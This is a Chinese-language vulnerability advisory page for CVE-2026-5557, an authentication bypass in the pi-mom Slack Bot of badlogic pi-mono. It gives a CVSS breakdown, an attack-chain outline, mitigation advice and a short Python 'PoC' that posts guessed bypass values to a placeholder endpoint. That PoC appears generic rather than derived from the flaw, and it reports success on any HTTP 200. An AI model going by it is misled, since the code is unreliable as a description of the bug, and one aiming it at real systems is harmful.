CVE-2026-5557 CVSS 6.3 中危

CVE-2026-5557: badlogic pi-mono认证绕过漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5557

漏洞类型

认证绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

badlogic pi-mono

漏洞概述

badlogic pi-mono 组件 pi-mom Slack Bot 在版本 0.58.4 及之前存在安全漏洞。该漏洞源于 packages/mom/src/slack.ts 文件中的未知处理逻辑缺陷。攻击者可通过网络远程利用此漏洞，利用备用信道绕过身份验证机制，导致系统机密性、完整性和可用性受到低程度影响。目前漏洞利用代码已公开，且厂商尚未做出响应，存在潜在安全风险。

技术细节

该漏洞根植于 badlogic pi-mono 项目的 pi-mom Slack Bot 组件核心逻辑中，具体受影响代码位于 packages/mom/src/slack.ts 文件。在处理特定交互请求时，系统未能正确实施多信道认证校验，导致存在逻辑缺陷。攻击者可利用这一缺陷，通过网络远程向目标服务器发送特制数据包，利用所谓的“备用信道”欺骗系统信任其身份。由于原本的身份验证机制被绕过，攻击者无需提供合法凭证即可获得低权限用户的访问权限。尽管 CVSS 评分显示影响程度为低，但该漏洞允许未授权访问，且攻击复杂度低，无需用户交互即可触发，对部署了该版本的企业构成了潜在的安全威胁。

攻击链分析

STEP 1

侦察

攻击者识别目标系统上运行的 badlogic pi-mono 组件及其 pi-mom Slack Bot 接口。

STEP 2

载荷构造

攻击者分析 packages/mom/src/slack.ts 的逻辑，构造能够利用备用信道的恶意请求数据包。

STEP 3

漏洞利用

攻击者通过网络远程发送特制请求，触发认证绕过漏洞。

STEP 4

未授权访问

系统错误验证了攻击者的身份，赋予其低权限用户的访问权限，泄露或修改数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: CVE-2026-5557 - badlogic pi-mono Auth Bypass
# Description: Bypass authentication in pi-mom Slack Bot via alternate channel

target_url = "http://target-host/slack-endpoint"

# Payload attempting to trigger the alternate channel authentication bypass
headers = {
    "User-Agent": "CVE-2026-5557-Exploit",
    "Content-Type": "application/json"
}

# Malicious payload manipulating the request to bypass auth checks
data = {
    "channel": "alternate_channel_bypass",
    "command": "restricted_command",
    "token": "bypass_token_payload" 
}

try:
    response = requests.post(target_url, json=data, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Authentication bypassed.")
        print("[+] Response:", response.text)
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

badlogic pi-mono <= 0.58.4

防御指南

临时缓解措施

鉴于厂商尚未发布补丁，建议暂时在网络层限制对 pi-mom Slack Bot 组件的访问，仅允许受信任的 IP 地址连接，并监控相关日志以检测异常认证尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5557
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5557
3 Details https://www.cvedetails.com/cve/CVE-2026-5557/
4 VulDB https://vuldb.com/cve/CVE-2026-5557
5 Link https://github.com/August829/CVEP/issues/28
6 Link https://vuldb.com/submit/782879
7 Link https://vuldb.com/vuln/355327
8 Link https://vuldb.com/vuln/355327/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表